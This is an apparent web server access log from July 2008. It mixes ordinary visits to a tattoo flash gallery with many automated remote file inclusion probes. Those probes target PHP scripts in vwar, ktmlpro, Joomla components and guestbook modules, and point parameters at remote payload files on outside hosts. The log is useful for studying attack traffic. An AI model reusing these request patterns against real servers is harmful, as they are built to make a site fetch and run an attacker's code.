194.143.183.8 - - [10/Jul/2008:20:44:43 -0500] "GET //pnc/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.tiptopwendys.co.za/ips.txt? HTTP/1.1" 404 325 "-""libwww-perl/5.79"
75.102.21.29 - - [10/Jul/2008:20:46:19 -0500] "GET /logs//ktmlpro/includes/ktedit/errors.php?error=http://granitecast.com////orca/a.txt?? HTTP/1.1" 404 324 "-""libwww-perl/5.811"
75.102.21.29 - - [10/Jul/2008:20:46:20 -0500] "GET //ktmlpro/includes/ktedit/errors.php?error=http://granitecast.com////orca/a.txt?? HTTP/1.1" 404 319 "-""libwww-perl/5.811"
80.93.62.99 - - [10/Jul/2008:20:50:37 -0500] "GET /logs//pnc/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.terrazon.com.ar/bajo.txt? HTTP/1.1" 404 330 "-""libwww-perl/5.805"
80.93.62.99 - - [10/Jul/2008:20:50:37 -0500] "GET //pnc/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.terrazon.com.ar/bajo.txt? HTTP/1.1" 404 325 "-""libwww-perl/5.805"
63.247.141.9 - - [10/Jul/2008:20:51:44 -0500] "GET /logs/!scanhttp://?? HTTP/1.1" 404 301 "-""libwww-perl/5.810"
63.247.141.9 - - [10/Jul/2008:20:51:45 -0500] "GET /!scanhttp://?? HTTP/1.1" 404 296 "-""libwww-perl/5.810"
194.143.183.8 - - [10/Jul/2008:20:51:45 -0500] "GET /logs//pnc/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.tiptopwendys.co.za/ips.txt? HTTP/1.1" 404 330 "-""libwww-perl/5.79"
194.143.183.8 - - [10/Jul/2008:20:51:46 -0500] "GET //pnc/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.tiptopwendys.co.za/ips.txt? HTTP/1.1" 404 325 "-""libwww-perl/5.79"
77.221.130.16 - - [10/Jul/2008:20:51:52 -0500] "GET /logs/!scanhttp://?? HTTP/1.1" 404 301 "-""libwww-perl/5.803"
77.221.130.16 - - [10/Jul/2008:20:51:52 -0500] "GET /!scanhttp://?? HTTP/1.1" 404 296 "-""libwww-perl/5.803"
63.247.141.9 - - [10/Jul/2008:20:51:55 -0500] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://?? HTTP/1.1" 404 352 "-""libwww-perl/5.810"
63.247.141.9 - - [10/Jul/2008:20:51:55 -0500] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://?? HTTP/1.1" 404 347 "-""libwww-perl/5.810"
77.221.130.16 - - [10/Jul/2008:20:55:52 -0500] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://?? HTTP/1.1" 404 352 "-""libwww-perl/5.803"
77.221.130.16 - - [10/Jul/2008:20:55:52 -0500] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://?? HTTP/1.1" 404 347 "-""libwww-perl/5.803"
64.202.126.170 - - [10/Jul/2008:20:56:00 -0500] "GET /logs//ktmlpro/includes/ktedit/errors.php?error=http://granitecast.com////orca/a.txt?? HTTP/1.1" 404 324 "-""libwww-perl/5.811"
64.202.126.170 - - [10/Jul/2008:20:56:00 -0500] "GET //ktmlpro/includes/ktedit/errors.php?error=http://granitecast.com////orca/a.txt?? HTTP/1.1" 404 319 "-""libwww-perl/5.811"
64.202.126.170 - - [10/Jul/2008:20:56:03 -0500] "GET /logs//ktmlpro/includes/ktedit/errors.php?error=http://granitecast.com////orca/a.txt?? HTTP/1.1" 404 324 "-""libwww-perl/5.811"
64.202.126.170 - - [10/Jul/2008:20:56:03 -0500] "GET //ktmlpro/includes/ktedit/errors.php?error=http://granitecast.com////orca/a.txt?? HTTP/1.1" 404 319 "-""libwww-perl/5.811"
75.117.223.196 - - [10/Jul/2008:20:56:33 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 3776 "http://en.wikipedia.org/wiki/Flash_(tattoo)""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2; .NET CLR 1.1.4322; Tablet PC 2.0)"
75.117.223.196 - - [10/Jul/2008:20:56:33 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2; .NET CLR 1.1.4322; Tablet PC 2.0)"
75.117.223.196 - - [10/Jul/2008:20:56:33 -0500] "GET /tattoo/webring.jpg HTTP/1.1" 200 13114 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2; .NET CLR 1.1.4322; Tablet PC 2.0)"
75.117.223.196 - - [10/Jul/2008:20:56:34 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2; .NET CLR 1.1.4322; Tablet PC 2.0)"
87.106.10.24 - - [10/Jul/2008:20:56:44 -0500] "GET /logs//ktmlpro/includes/ktedit/errors.php?error=http://granitecast.com////orca/a.txt?? HTTP/1.1" 404 324 "-""libwww-perl/5.805"
87.106.10.24 - - [10/Jul/2008:20:56:44 -0500] "GET //ktmlpro/includes/ktedit/errors.php?error=http://granitecast.com////orca/a.txt?? HTTP/1.1" 404 319 "-""libwww-perl/5.805"
209.35.191.103 - - [10/Jul/2008:20:57:20 -0500] "GET /logs/!scanhttp://?? HTTP/1.1" 404 301 "-""libwww-perl/5.64"
209.35.191.103 - - [10/Jul/2008:20:57:20 -0500] "GET /!scanhttp://?? HTTP/1.1" 404 296 "-""libwww-perl/5.64"
59.126.172.166 - - [10/Jul/2008:20:59:32 -0500] "GET /logs//pnc/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.tiptopwendys.co.za/ips.txt?? HTTP/1.1" 404 330 "-""libwww-perl/5.805"
59.126.172.166 - - [10/Jul/2008:20:59:33 -0500] "GET //pnc/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.tiptopwendys.co.za/ips.txt?? HTTP/1.1" 404 325 "-""libwww-perl/5.805"
80.67.23.172 - - [10/Jul/2008:21:00:19 -0500] "GET /logs//ktmlpro/includes/ktedit/errors.php?error=http://granitecast.com////orca/a.txt?? HTTP/1.1" 404 324 "-""libwww-perl/5.808"
80.67.23.172 - - [10/Jul/2008:21:00:20 -0500] "GET //ktmlpro/includes/ktedit/errors.php?error=http://granitecast.com////orca/a.txt?? HTTP/1.1" 404 319 "-""libwww-perl/5.808"
89.218.85.18 - - [10/Jul/2008:21:01:17 -0500] "GET /logs//index.php?option=com_bsq_sitestats&Itemid=&mosConfig_absolute_path=http://www.radiomorada.com.br/safeon.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
89.218.85.18 - - [10/Jul/2008:21:01:18 -0500] "GET //index.php?option=com_bsq_sitestats&Itemid=&mosConfig_absolute_path=http://www.radiomorada.com.br/safeon.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
217.160.200.228 - - [10/Jul/2008:21:01:28 -0500] "GET /logs//pnc/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.tiptopwendys.co.za/ips.txt? HTTP/1.1" 404 330 "-""libwww-perl/5.803"
217.160.200.228 - - [10/Jul/2008:21:01:29 -0500] "GET //pnc/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.tiptopwendys.co.za/ips.txt? HTTP/1.1" 404 325 "-""libwww-perl/5.803"
74.6.8.88 - - [10/Jul/2008:21:02:14 -0500] "GET /logs/access_log.1174348800 HTTP/1.0" 200 228362 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
200.11.67.242 - - [10/Jul/2008:21:02:14 -0500] "GET /logs//config/dbutil.bck.php?confdir=http://www.cafelecaire.com/gallery/data/blid.txt??? HTTP/1.1" 404 311 "-""libwww-perl/5.65"
200.11.67.242 - - [10/Jul/2008:21:02:15 -0500] "GET //config/dbutil.bck.php?confdir=http://www.cafelecaire.com/gallery/data/blid.txt??? HTTP/1.1" 404 306 "-""libwww-perl/5.65"
77.74.196.90 - - [10/Jul/2008:21:03:12 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=http://www.cafelecaire.com/gallery/data/blid.txt??? HTTP/1.1" 404 313 "-""libwww-perl/5.811"
77.74.196.90 - - [10/Jul/2008:21:03:13 -0500] "GET //Neos_Chronos/header.php?base_folder=http://www.cafelecaire.com/gallery/data/blid.txt??? HTTP/1.1" 404 308 "-""libwww-perl/5.811"
205.234.234.3 - - [10/Jul/2008:21:03:32 -0500] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://granitecast.com////orca/a.txt?? HTTP/1.1" 404 338 "-""libwww-perl/5.812"
205.234.234.3 - - [10/Jul/2008:21:03:32 -0500] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://granitecast.com////orca/a.txt?? HTTP/1.1" 404 333 "-""libwww-perl/5.812"
75.102.21.29 - - [10/Jul/2008:21:04:08 -0500] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://granitecast.com////orca/a.txt?? HTTP/1.1" 404 338 "-""libwww-perl/5.811"
75.102.21.29 - - [10/Jul/2008:21:04:08 -0500] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://granitecast.com////orca/a.txt?? HTTP/1.1" 404 333 "-""libwww-perl/5.811"
64.72.112.223 - - [10/Jul/2008:21:04:15 -0500] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://granitecast.com////orca/a.txt?? HTTP/1.1" 404 338 "-""libwww-perl/5.800"
64.72.112.223 - - [10/Jul/2008:21:04:15 -0500] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://granitecast.com////orca/a.txt?? HTTP/1.1" 404 333 "-""libwww-perl/5.800"
62.1.206.147 - - [10/Jul/2008:21:05:06 -0500] "GET /logs//atom.php5?page=http://www.cafelecaire.com/gallery/data/blid.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
62.1.206.147 - - [10/Jul/2008:21:05:06 -0500] "GET //atom.php5?page=http://www.cafelecaire.com/gallery/data/blid.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
80.67.23.172 - - [10/Jul/2008:21:06:34 -0500] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://granitecast.com////orca/a.txt?? HTTP/1.1" 404 338 "-""libwww-perl/5.808"
80.67.23.172 - - [10/Jul/2008:21:06:34 -0500] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://granitecast.com////orca/a.txt?? HTTP/1.1" 404 333 "-""libwww-perl/5.808"
87.106.10.24 - - [10/Jul/2008:21:06:46 -0500] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://granitecast.com////orca/a.txt?? HTTP/1.1" 404 338 "-""libwww-perl/5.805"
87.106.10.24 - - [10/Jul/2008:21:06:46 -0500] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://granitecast.com////orca/a.txt?? HTTP/1.1" 404 333 "-""libwww-perl/5.805"
75.102.21.29 - - [10/Jul/2008:21:06:47 -0500] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://granitecast.com////orca/a.txt?? HTTP/1.1" 404 338 "-""libwww-perl/5.811"
75.102.21.29 - - [10/Jul/2008:21:06:47 -0500] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://granitecast.com////orca/a.txt?? HTTP/1.1" 404 333 "-""libwww-perl/5.811"
116.125.113.115 - - [10/Jul/2008:21:06:59 -0500] "GET /logs//ktmlpro/includes/ktedit/errors.php?error=http://granitecast.com////orca/a.txt?? HTTP/1.1" 404 324 "-""libwww-perl/5.79"
116.125.113.115 - - [10/Jul/2008:21:07:00 -0500] "GET //ktmlpro/includes/ktedit/errors.php?error=http://granitecast.com////orca/a.txt?? HTTP/1.1" 404 319 "-""libwww-perl/5.79"
217.20.163.130 - - [10/Jul/2008:21:07:23 -0500] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.cafelecaire.com/gallery/data/blid.txt??? HTTP/1.1" 404 313 "-""libwww-perl/5.65"
217.20.163.130 - - [10/Jul/2008:21:07:23 -0500] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.cafelecaire.com/gallery/data/blid.txt??? HTTP/1.1" 404 308 "-""libwww-perl/5.65"
217.170.21.116 - - [10/Jul/2008:21:07:46 -0500] "GET /logs//pnc/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.nipservers.com/modules/Forums/admin/echo.txt??? HTTP/1.1" 404 330 "-""libwww-perl/5.79"
217.170.21.116 - - [10/Jul/2008:21:07:47 -0500] "GET //pnc/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.nipservers.com/modules/Forums/admin/echo.txt??? HTTP/1.1" 404 325 "-""libwww-perl/5.79"
89.218.85.18 - - [10/Jul/2008:21:09:28 -0500] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.radiomorada.com.br/safeon.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
89.218.85.18 - - [10/Jul/2008:21:09:28 -0500] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.radiomorada.com.br/safeon.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
64.202.126.170 - - [10/Jul/2008:21:09:40 -0500] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://granitecast.com////orca/a.txt?? HTTP/1.1" 404 338 "-""libwww-perl/5.811"
64.202.126.170 - - [10/Jul/2008:21:09:41 -0500] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://granitecast.com////orca/a.txt?? HTTP/1.1" 404 333 "-""libwww-perl/5.811"
64.202.126.170 - - [10/Jul/2008:21:10:20 -0500] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://granitecast.com////orca/a.txt?? HTTP/1.1" 404 338 "-""libwww-perl/5.811"
64.202.126.170 - - [10/Jul/2008:21:10:20 -0500] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://granitecast.com////orca/a.txt?? HTTP/1.1" 404 333 "-""libwww-perl/5.811"
62.1.206.147 - - [10/Jul/2008:21:10:26 -0500] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.cafelecaire.com/gallery/data/blid.txt??? HTTP/1.1" 404 313 "-""libwww-perl/5.79"
62.1.206.147 - - [10/Jul/2008:21:10:26 -0500] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.cafelecaire.com/gallery/data/blid.txt??? HTTP/1.1" 404 308 "-""libwww-perl/5.79"
71.65.120.249 - - [10/Jul/2008:21:11:27 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 3776 "http://www.google.com/search?client=safari&rls=en-us&q=vintage+tattoo+flash&ie=UTF-8&oe=UTF-8""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_4; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
71.65.120.249 - - [10/Jul/2008:21:11:27 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_4; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
71.65.120.249 - - [10/Jul/2008:21:11:27 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_4; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
71.65.120.249 - - [10/Jul/2008:21:11:27 -0500] "GET /tattoo/webring.jpg HTTP/1.1" 200 13114 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_4; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
71.65.120.249 - - [10/Jul/2008:21:11:32 -0500] "GET /tattoo/set1.htm HTTP/1.1" 200 2676 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_4; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
71.65.120.249 - - [10/Jul/2008:21:11:32 -0500] "GET /tattoo/tat10.JPG HTTP/1.1" 200 22746 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_4; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
71.65.120.249 - - [10/Jul/2008:21:11:32 -0500] "GET /tattoo/tat2.JPG HTTP/1.1" 200 18943 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_4; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
71.65.120.249 - - [10/Jul/2008:21:11:32 -0500] "GET /tattoo/tat1.JPG HTTP/1.1" 200 16158 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_4; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
71.65.120.249 - - [10/Jul/2008:21:11:32 -0500] "GET /tattoo/tat3.jpg HTTP/1.1" 200 11901 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_4; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
71.65.120.249 - - [10/Jul/2008:21:11:32 -0500] "GET /tattoo/tat5.JPG HTTP/1.1" 200 13769 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_4; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
71.65.120.249 - - [10/Jul/2008:21:11:32 -0500] "GET /tattoo/tat8.jpg HTTP/1.1" 200 13191 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_4; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
71.65.120.249 - - [10/Jul/2008:21:11:32 -0500] "GET /tattoo/tat7.JPG HTTP/1.1" 200 17358 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_4; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
71.65.120.249 - - [10/Jul/2008:21:11:32 -0500] "GET /tattoo/tat4.JPG HTTP/1.1" 200 18080 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_4; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
71.65.120.249 - - [10/Jul/2008:21:11:32 -0500] "GET /tattoo/tat6.JPG HTTP/1.1" 200 18543 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_4; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
71.65.120.249 - - [10/Jul/2008:21:11:32 -0500] "GET /tattoo/tat9.JPG HTTP/1.1" 200 16749 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_4; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
71.65.120.249 - - [10/Jul/2008:21:11:38 -0500] "GET /tattoo/set2.htm HTTP/1.1" 200 2378 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_4; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
71.65.120.249 - - [10/Jul/2008:21:11:38 -0500] "GET /tattoo/tatb5.JPG HTTP/1.1" 200 20135 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_4; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
71.65.120.249 - - [10/Jul/2008:21:11:38 -0500] "GET /tattoo/tatb8.JPG HTTP/1.1" 200 18467 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_4; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
71.65.120.249 - - [10/Jul/2008:21:11:38 -0500] "GET /tattoo/tatb4.JPG HTTP/1.1" 200 15705 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_4; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
71.65.120.249 - - [10/Jul/2008:21:11:38 -0500] "GET /tattoo/tatb6.JPG HTTP/1.1" 200 21190 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_4; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
71.65.120.249 - - [10/Jul/2008:21:11:39 -0500] "GET /tattoo/tatb1.JPG HTTP/1.1" 200 14848 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_4; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
71.65.120.249 - - [10/Jul/2008:21:11:39 -0500] "GET /tattoo/tatb3.JPG HTTP/1.1" 200 16163 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_4; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
71.65.120.249 - - [10/Jul/2008:21:11:39 -0500] "GET /tattoo/tatb7.JPG HTTP/1.1" 200 16193 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_4; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
71.65.120.249 - - [10/Jul/2008:21:11:39 -0500] "GET /tattoo/tatb2.JPG HTTP/1.1" 200 16592 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_4; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
71.65.120.249 - - [10/Jul/2008:21:11:39 -0500] "GET /tattoo/tatb10.JPG HTTP/1.1" 200 17887 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_4; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
71.65.120.249 - - [10/Jul/2008:21:11:39 -0500] "GET /tattoo/tatb9.JPG HTTP/1.1" 200 21598 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_4; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
71.65.120.249 - - [10/Jul/2008:21:11:46 -0500] "GET /tattoo/set3.htm HTTP/1.1" 200 2177 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_4; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
71.65.120.249 - - [10/Jul/2008:21:11:46 -0500] "GET /tattoo/tatc7.JPG HTTP/1.1" 200 12347 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_4; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
71.65.120.249 - - [10/Jul/2008:21:11:46 -0500] "GET /tattoo/tatc5.JPG HTTP/1.1" 200 19436 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_4; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
71.65.120.249 - - [10/Jul/2008:21:11:46 -0500] "GET /tattoo/tatc3.JPG HTTP/1.1" 200 16313 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_4; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
71.65.120.249 - - [10/Jul/2008:21:11:46 -0500] "GET /tattoo/tatc6.JPG HTTP/1.1" 200 14549 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_4; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
71.65.120.249 - - [10/Jul/2008:21:11:46 -0500] "GET /tattoo/tatc8.JPG HTTP/1.1" 200 17057 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_4; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
71.65.120.249 - - [10/Jul/2008:21:11:47 -0500] "GET /tattoo/tatc9.JPG HTTP/1.1" 200 18139 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_4; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
71.65.120.249 - - [10/Jul/2008:21:11:47 -0500] "GET /tattoo/tatc1.JPG HTTP/1.1" 200 21412 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_4; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
71.65.120.249 - - [10/Jul/2008:21:11:47 -0500] "GET /tattoo/tatc4.JPG HTTP/1.1" 200 12619 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_4; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
71.65.120.249 - - [10/Jul/2008:21:11:47 -0500] "GET /tattoo/tatc2.JPG HTTP/1.1" 200 17893 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_4; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
71.65.120.249 - - [10/Jul/2008:21:11:47 -0500] "GET /tattoo/tatc10.JPG HTTP/1.1" 200 14157 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_4; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
80.67.23.172 - - [10/Jul/2008:21:11:49 -0500] "GET /logs//ktmlpro/includes/ktedit/errors.php?error=http://granitecast.com////orca/a.txt?? HTTP/1.1" 404 324 "-""libwww-perl/5.808"
80.67.23.172 - - [10/Jul/2008:21:11:52 -0500] "GET //ktmlpro/includes/ktedit/errors.php?error=http://granitecast.com////orca/a.txt?? HTTP/1.1" 404 319 "-""libwww-perl/5.808"
71.65.120.249 - - [10/Jul/2008:21:11:53 -0500] "GET /tattoo/set4.htm HTTP/1.1" 200 1762 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_4; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
71.65.120.249 - - [10/Jul/2008:21:11:53 -0500] "GET /tattoo/tatd8.JPG HTTP/1.1" 200 13038 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_4; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
71.65.120.249 - - [10/Jul/2008:21:11:53 -0500] "GET /tattoo/tatd4.JPG HTTP/1.1" 200 12068 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_4; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
71.65.120.249 - - [10/Jul/2008:21:11:53 -0500] "GET /tattoo/tatd6.JPG HTTP/1.1" 200 12059 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_4; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
